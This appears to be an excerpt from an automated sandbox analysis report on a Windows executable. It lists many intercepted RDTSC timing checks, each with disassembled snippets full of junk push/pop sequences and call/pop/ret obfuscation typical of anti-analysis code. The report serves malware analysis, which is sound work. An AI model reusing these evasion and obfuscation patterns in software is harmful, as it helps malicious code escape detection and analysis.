Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E5ABB second address: 10E5AD9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE66CCE6056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007FE66CCE605Ch 0x00000018 jbe 00007FE66CCE6056h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E5E5C second address: 10E5E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E5E60 second address: 10E5E66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E5F14 second address: 10E5F19 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E6B8D second address: 10E6BA6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007FE66CCE605Ch 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E6BA6 second address: 10E6BAB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E6D36 second address: 10E6D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E6D3C second address: 10E6D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE66CFB4FE4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E8C58 second address: 10E8C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E96CE second address: 10E96D8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE66CFB4FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E96D8 second address: 10E9751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FE66CCE6058h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 jnc 00007FE66CCE6058h 0x0000002b push 00000000h 0x0000002d mov di, ax 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FE66CCE6058h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c mov esi, dword ptr [ebp+122D362Ch] 0x00000052 pushad 0x00000053 je 00007FE66CCE6057h 0x00000059 cld 0x0000005a mov edx, 3BE97624h 0x0000005f popad 0x00000060 xchg eax, ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FE66CCE605Dh 0x00000068 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E9751 second address: 10E9767 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE66CFB4FD8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E94DD second address: 10E94E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10EA107 second address: 10EA10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E9EA5 second address: 10E9EB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007FE66CCE6056h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E9EB7 second address: 10E9EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10EACAD second address: 10EACBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FE66CCE6058h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10EACBE second address: 10EAD36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FE66CFB4FD8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 clc 0x00000025 add dword ptr [ebp+122D3840h], ecx 0x0000002b push 00000000h 0x0000002d cld 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007FE66CFB4FD8h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a push edx 0x0000004b mov dword ptr [ebp+122D2679h], ecx 0x00000051 pop esi 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10EAD36 second address: 10EAD3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10EAA74 second address: 10EAA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10EB7A1 second address: 10EB7A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10EB7A7 second address: 10EB7AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 109A4DA second address: 109A4DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10EFB8D second address: 10EFB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10EFB93 second address: 10EFBB6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE66CCE6062h 0x00000008 pushad 0x00000009 jg 00007FE66CCE6056h 0x0000000f je 00007FE66CCE6056h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10EFBB6 second address: 10EFBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10AE77D second address: 10AE793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE6062h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10AE793 second address: 10AE79D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FE66CFB4FD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10AE79D second address: 10AE7C9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE66CCE6056h 0x00000008 jc 00007FE66CCE6056h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007FE66CCE6056h 0x00000018 jmp 00007FE66CCE6064h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10F4116 second address: 10F4124 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FE66CFB4FDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10F50BE second address: 10F50C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10F50C2 second address: 10F50C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10F50C6 second address: 10F5148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jnl 00007FE66CCE6068h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FE66CCE6058h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b jnp 00007FE66CCE6059h 0x00000031 stc 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007FE66CCE6058h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e and edi, dword ptr [ebp+122D2523h] 0x00000054 xchg eax, esi 0x00000055 pushad 0x00000056 jmp 00007FE66CCE605Dh 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10F5148 second address: 10F5156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10F5156 second address: 10F515A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10F515A second address: 10F5160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10F5160 second address: 10F5166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10F605E second address: 10F606C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10F606C second address: 10F6072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10F8187 second address: 10F819B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10F7356 second address: 10F7361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE66CCE6056h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10F7361 second address: 10F7392 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE66CFB4FE1h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE66CFB4FE9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10F7392 second address: 10F739C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE66CCE605Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10FA8FF second address: 10FA904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10FA904 second address: 10FA92F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CCE6069h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007FE66CCE6060h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10F83E2 second address: 10F83E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10FCB4E second address: 10FCB58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10FCB58 second address: 10FCB5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10FBC6A second address: 10FBC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FE66CCE6056h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10FBC79 second address: 10FBC7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10FDB50 second address: 10FDB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10FDB54 second address: 10FDB58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10FDB58 second address: 10FDB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10FDB5E second address: 10FDB64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1100B75 second address: 1100BFE instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE66CCE605Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jg 00007FE66CCE6064h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FE66CCE6058h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+1245AAB3h] 0x00000034 push eax 0x00000035 mov edi, 35720E0Eh 0x0000003a pop edi 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007FE66CCE6058h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 0000001Ch 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FE66CCE605Ah 0x0000005f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1100BFE second address: 1100C09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FE66CFB4FD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10FCD9C second address: 10FCDA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1101BDF second address: 1101BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1101BE5 second address: 1101BFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE605Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1101BFE second address: 1101C1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1101C1C second address: 1101C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1100D78 second address: 1100D82 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE66CFB4FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1102D45 second address: 1102D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1102D49 second address: 1102D57 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE66CFB4FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1103C37 second address: 1103C82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE605Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jg 00007FE66CCE6062h 0x00000011 nop 0x00000012 movzx ebx, bx 0x00000015 push 00000000h 0x00000017 sub edi, dword ptr [ebp+122D2D0Ch] 0x0000001d push 00000000h 0x0000001f mov ebx, dword ptr [ebp+122D34F1h] 0x00000025 push eax 0x00000026 pushad 0x00000027 jmp 00007FE66CCE6060h 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1103DCC second address: 1103DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1103DD5 second address: 1103DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE6066h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1103DF7 second address: 1103E01 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE66CFB4FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11072D0 second address: 11072DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE605Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11072DE second address: 1107300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FE66CFB4FD8h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110920C second address: 1109218 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1109218 second address: 110921C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110CB1A second address: 110CB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110CB22 second address: 110CB42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FE66CFB4FE7h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110CB42 second address: 110CB46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110CB46 second address: 110CB6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CFB4FE6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FE66CFB4FD6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110CB6A second address: 110CB70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110CB70 second address: 110CB91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007FE66CFB4FE5h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110CB91 second address: 110CB96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110C36C second address: 110C372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110C372 second address: 110C37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110C37C second address: 110C382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110C382 second address: 110C386 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110C54E second address: 110C559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE66CFB4FD6h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 110C559 second address: 110C565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FE66CCE6056h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
